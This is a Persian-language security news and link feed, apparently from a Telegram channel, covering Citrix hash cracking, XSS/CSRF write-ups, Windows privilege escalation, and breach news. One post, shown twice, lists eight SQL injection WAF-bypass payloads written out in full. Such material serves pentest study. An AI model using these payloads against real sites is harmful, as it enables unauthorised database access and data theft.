امنیت اطلاعات
شکستن هش های Citrix Netscaler با hashcat https://github.com/hashcat/hashcat/commit/53105abeb47a6c325dee6714b1503cd68bd0c9c8 #hashcat #citrix @sec_nerd
رمزگشایی مقادیر استخراج شده از کانفیگ Citrix
https://dozer.nz/citrix-decrypt/
#citrix
#shitrix
@sec_nerd
https://dozer.nz/citrix-decrypt/
#citrix
#shitrix
@sec_nerd
dozer.nz
Citrix Netscaler config decryption
hacking and technology
هشت روش برای دور زدن WAF در حملات تزریق SQL
1.Nullbyte:
%00' UNION SELECT password FROM Users WHERE username-'tom'--
2. SQL Comments:
'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/usersame/**/LIKE/**/'tom'--
3. URL encoding:
%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/password%252f%252a*/FROM%252f%252a*/Users%252f%25a*/WHERE%252f%252a*/username%252f%252a*/LIKE%252f%252a*/'tom'--
4. Changing Cases:
UniOn AlL SeLeCt/*inc0gbyt3*/select/**/1,2,3,4,5 --
5. HTTP Parameter Pollution (HPP):
Regular attack SQLi hxxps://www.xxx.com/noticias.php?id=1 union select 1,2 --
HPP attack + SQLi: hxxps://www.xxx.com/noticias.php?id=1&id=*/union/*&id=*/select/*&id=*/1,2+--+
6. Replacing keywords technique
hxxps://www.xxx.com/artigos.php?id=123+UnIoN+SeLselectECT+1,2,3,4,5--
7. CRLF WAF Bypass (Carriage Return, Line Feed) - Common on (aspxasp) applications
Putting theses chars at the beggining of payload
%0A%0d+select+user+from+dual+%0A%0D
8. Buffer Overflow bypassing:
and (select 1) = (select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..... A's)
https://incogbyte.github.io/sqli_waf_bypass/
#sqli
#WAF
#web
#pentest
@sec_nerd
1.Nullbyte:
%00' UNION SELECT password FROM Users WHERE username-'tom'--
2. SQL Comments:
'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/usersame/**/LIKE/**/'tom'--
3. URL encoding:
%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/password%252f%252a*/FROM%252f%252a*/Users%252f%25a*/WHERE%252f%252a*/username%252f%252a*/LIKE%252f%252a*/'tom'--
4. Changing Cases:
UniOn AlL SeLeCt/*inc0gbyt3*/select/**/1,2,3,4,5 --
5. HTTP Parameter Pollution (HPP):
Regular attack SQLi hxxps://www.xxx.com/noticias.php?id=1 union select 1,2 --
HPP attack + SQLi: hxxps://www.xxx.com/noticias.php?id=1&id=*/union/*&id=*/select/*&id=*/1,2+--+
6. Replacing keywords technique
hxxps://www.xxx.com/artigos.php?id=123+UnIoN+SeLselectECT+1,2,3,4,5--
7. CRLF WAF Bypass (Carriage Return, Line Feed) - Common on (aspxasp) applications
Putting theses chars at the beggining of payload
%0A%0d+select+user+from+dual+%0A%0D
8. Buffer Overflow bypassing:
and (select 1) = (select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..... A's)
https://incogbyte.github.io/sqli_waf_bypass/
#sqli
#WAF
#web
#pentest
@sec_nerd
سرقت توکن های CSRF با استفاده از XSS
https://sametsahin.net/posts/steal-csrf-tokens-with-simple-xss/
#xss
#csrf
@sec_nerd
https://sametsahin.net/posts/steal-csrf-tokens-with-simple-xss/
#xss
#csrf
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
بالابردن سطح دسترسی از ادمین Hyper-v به یوزر SYSTEM در آخرین نسخه ی پچ شده ی ویندوز ۱۰
https://decoder.cloud/2020/01/20/from-hyper-v-admin-to-system/
ابزار:
https://github.com/decoder-it/Hyper-V-admin-EOP/
#windows
#privesc
#hyper_v
@sec_nerd
https://decoder.cloud/2020/01/20/from-hyper-v-admin-to-system/
ابزار:
https://github.com/decoder-it/Hyper-V-admin-EOP/
#windows
#privesc
#hyper_v
@sec_nerd
مجموعه رایت آپهای مرتبط با آسیب پذیری Reflected XSS
Reflected XSS
https://link.medium.com/j1cgHbZpq3
https://link.medium.com/q9eeokp2J3
https://link.medium.com/5zdO3gPEw3
https://link.medium.com/vwwEcNQEw3
https://link.medium.com/TH0sHaq2J3
https://link.medium.com/njXx6sq2J3
https://victoni.github.io/bug-hunting-xss-on-cookie-popup-warning
https://gauravnarwani.com/cookie-worth-a-fortune
https://link.medium.com/bx6lLPq2J3
https://link.medium.com/3khM76q2J3
#bugbounty
#xss
#writeup
#pentest
#web
@sec_nerd
Reflected XSS
https://link.medium.com/j1cgHbZpq3
https://link.medium.com/q9eeokp2J3
https://link.medium.com/5zdO3gPEw3
https://link.medium.com/vwwEcNQEw3
https://link.medium.com/TH0sHaq2J3
https://link.medium.com/njXx6sq2J3
https://victoni.github.io/bug-hunting-xss-on-cookie-popup-warning
https://gauravnarwani.com/cookie-worth-a-fortune
https://link.medium.com/bx6lLPq2J3
https://link.medium.com/3khM76q2J3
#bugbounty
#xss
#writeup
#pentest
#web
@sec_nerd
Medium
XSS on Sony subdomain
Hi guys. This is my first bug bounty writeup. I started to bug bounty on july 22, 2019. I want to share with community all the…
مجموعه رایت آپهای مرتبط با آسیب پذیری CSRF
https://santuysec.com/2020/01/21/google-bug-bounty-csrf-in-learndigital-withgoogle-com
https://link.medium.com/cMm5RBzqH3
https://link.medium.com/Gg2BkPzqH3
https://link.medium.com/vZ6kv6zqH3
https://link.medium.com/NYlc5kcIw3
https://link.medium.com/qE0NmPAqH3
https://link.medium.com/jnPy23AqH3
https://link.medium.com/mDuIOdiWx3
https://noobe.io/articles/2019-10/xss-to-account-takeover
https://smaranchand.com.np/2019/10/an-inconsistent-csrf
#bugbounty
#web
#pentest
#writeup
#csrf
@sec_nerd
https://santuysec.com/2020/01/21/google-bug-bounty-csrf-in-learndigital-withgoogle-com
https://link.medium.com/cMm5RBzqH3
https://link.medium.com/Gg2BkPzqH3
https://link.medium.com/vZ6kv6zqH3
https://link.medium.com/NYlc5kcIw3
https://link.medium.com/qE0NmPAqH3
https://link.medium.com/jnPy23AqH3
https://link.medium.com/mDuIOdiWx3
https://noobe.io/articles/2019-10/xss-to-account-takeover
https://smaranchand.com.np/2019/10/an-inconsistent-csrf
#bugbounty
#web
#pentest
#writeup
#csrf
@sec_nerd
👍1
شرکت ژاپنی NEC اعتراف کرد شبکه داخلی اش در سال ۲۰۱۶ مورد حمله ی هکرها قرار گرفته است.
آنها در سال ۲۰۱۷ متوجه ترافیک رمزنگاری شده ی مشکوکی در شبکه داخلی خود شدند که یکسال بعد توانستند آن را رمزگشایی کرده و متوجه شوند که این ترافیک بیش از ۲۷ هزار فایل را از بخش تجارت دفاعی شرکت به سرقت برده است!
با اینکه شرکت NEC دومین شرکت پیمانکار نظامی در ژاپن است که مورد حمله ی هکرها قرار میگیرد اما مسئولان این شرکت اعلام کردند که داده های سرقت شده حاوی پروژه های دفاعی یا اطلاعات شخصی کارکنان نبوده است.
https://www.zdnet.com/article/japanese-company-nec-confirms-2016-security-breach/
#breach
#news
#japan
@sec_nerd
آنها در سال ۲۰۱۷ متوجه ترافیک رمزنگاری شده ی مشکوکی در شبکه داخلی خود شدند که یکسال بعد توانستند آن را رمزگشایی کرده و متوجه شوند که این ترافیک بیش از ۲۷ هزار فایل را از بخش تجارت دفاعی شرکت به سرقت برده است!
با اینکه شرکت NEC دومین شرکت پیمانکار نظامی در ژاپن است که مورد حمله ی هکرها قرار میگیرد اما مسئولان این شرکت اعلام کردند که داده های سرقت شده حاوی پروژه های دفاعی یا اطلاعات شخصی کارکنان نبوده است.
https://www.zdnet.com/article/japanese-company-nec-confirms-2016-security-breach/
#breach
#news
#japan
@sec_nerd
ZDNet
Japanese company NEC confirms 2016 security breach
NEC needed seven months to discover the hack, did not disclose it publicly.
بر اساس گزارش SonicWall هکرها به دنبال نفوذ به سیستم های کنترل ورود به منزل و درب های هوشمند هستند تا از این طریق حملات DDOS را صورت دهند.
این دستگاههای هوشمند NSC Linear eMerge E3 نام دارند و تا کنون ۱۰ آسیب پذیری از آنها کشف شده است که یکی از آنها از نوع command injection است و به هکرها اجازه میدهد بدون احراز هویت، اقدام به اجرای دستور از دور نمایند.
https://www.zdnet.com/article/hackers-are-hijacking-smart-building-access-systems-to-launch-ddos-attacks/
#iot
#ddos
#news
@sec_nerd
این دستگاههای هوشمند NSC Linear eMerge E3 نام دارند و تا کنون ۱۰ آسیب پذیری از آنها کشف شده است که یکی از آنها از نوع command injection است و به هکرها اجازه میدهد بدون احراز هویت، اقدام به اجرای دستور از دور نمایند.
https://www.zdnet.com/article/hackers-are-hijacking-smart-building-access-systems-to-launch-ddos-attacks/
#iot
#ddos
#news
@sec_nerd
ZDNet
Hackers are hijacking smart building access systems to launch DDoS attacks
More than 2,300 building access systems can be hijacked due to a severe vulnerability left without a fix.
تشریح روش های نوین حمله ی XSS
https://netsec.expert/2020/02/01/xss-in-2020.html
#xss
#bugbounty
#web
@sec_nerd
https://netsec.expert/2020/02/01/xss-in-2020.html
#xss
#bugbounty
#web
@sec_nerd
برخی روش ها و نمونه های دور زدن محدودیت های تزریق SQL
https://withoutmoneyschool.blogspot.com/2016/05/sql-injection-selecting-from-table.html
https://bot-insane.com/The-day-of-the-first-hacking/
#sqli
#waf
#web
#pentest
@sec_nerd
https://withoutmoneyschool.blogspot.com/2016/05/sql-injection-selecting-from-table.html
https://bot-insane.com/The-day-of-the-first-hacking/
#sqli
#waf
#web
#pentest
@sec_nerd
رایت آپ مهندسی معکوس teamviewer و کشف محل ذخیره سازی پسوردهای رمزنگاری شده در رجیستری و سپس یافتن کلید رمزنگاری و IV و در نهایت رمزگشایی پسورد
https://whynotsecurity.com/blog/teamviewer/
#writeup
#teamviewer
#RE
@sec_nerd
https://whynotsecurity.com/blog/teamviewer/
#writeup
#teamviewer
#RE
@sec_nerd
WhyNotSecurity
TeamViewer
Oh man where to even begin with this one. This was a crazy ride and I learned a ton along the way.
شخصی اکسپلویتی رو برای فروش گذاشته که ادعا میکنه بر روی تمام مرورگرها و تمام سیستم عامل های ویندزوی قابلیت اجرای دستور رو داره و آنتی ویروس ها هم اون رو شناسایی نمیکنن!
این اکسپلویت که همراه با یک ویدیوی اثبات ارائه شده با قیمت بسیار ناچیز (در برابر این امکانی که به هکرها میده) ۲ هزار دلار به فروش میرسه!
https://0day.today/exploit/description/33872
#exploit
#browser
#windows
@sec_nerd
این اکسپلویت که همراه با یک ویدیوی اثبات ارائه شده با قیمت بسیار ناچیز (در برابر این امکانی که به هکرها میده) ۲ هزار دلار به فروش میرسه!
https://0day.today/exploit/description/33872
#exploit
#browser
#windows
@sec_nerd
یک محقق موفق شد با کشف چند آسیب پذیری در نسخه های دسکتاپ و وب واتس اپ، فایلهای سیستمی کامپیوتر قربانی را بخواند!
این آسیب پذیری ها شامل:
تغییر متن پیامی که به آن ریپلای شده است
ایجاد یک پیام حاوی آدرس وب که بنر آن با لینک اصلی متفاوت است و امکان Open Redirect نیز دارد
سوء استفاده از آسیب پذیری Open Redirect و تبدیل آن به Persistent XSS
و در نهایت رسیدن از Persistent-XSS به خواندن فایلهای سیستمی در مک و ویندوز که پتانسیل حمله ی RCE را نیز دارد
https://www.perimeterx.com/tech-blog/2020/whatsapp-fs-read-vuln-disclosure/
#news
#whatsapp
#exploit
@sec_nerd
این آسیب پذیری ها شامل:
تغییر متن پیامی که به آن ریپلای شده است
ایجاد یک پیام حاوی آدرس وب که بنر آن با لینک اصلی متفاوت است و امکان Open Redirect نیز دارد
سوء استفاده از آسیب پذیری Open Redirect و تبدیل آن به Persistent XSS
و در نهایت رسیدن از Persistent-XSS به خواندن فایلهای سیستمی در مک و ویندوز که پتانسیل حمله ی RCE را نیز دارد
https://www.perimeterx.com/tech-blog/2020/whatsapp-fs-read-vuln-disclosure/
#news
#exploit
@sec_nerd
هنوز هم بیش از ۸۰ هزار دستگاه از آسیب پذیری Heartbleed که در سال ۲۰۱۴ کشف شد رنج میبرند!
https://twitter.com/shodanhq/status/1224799751767568384?s=20
#shodan
#heartbleed
@sec_nerd
https://twitter.com/shodanhq/status/1224799751767568384?s=20
#shodan
#heartbleed
@sec_nerd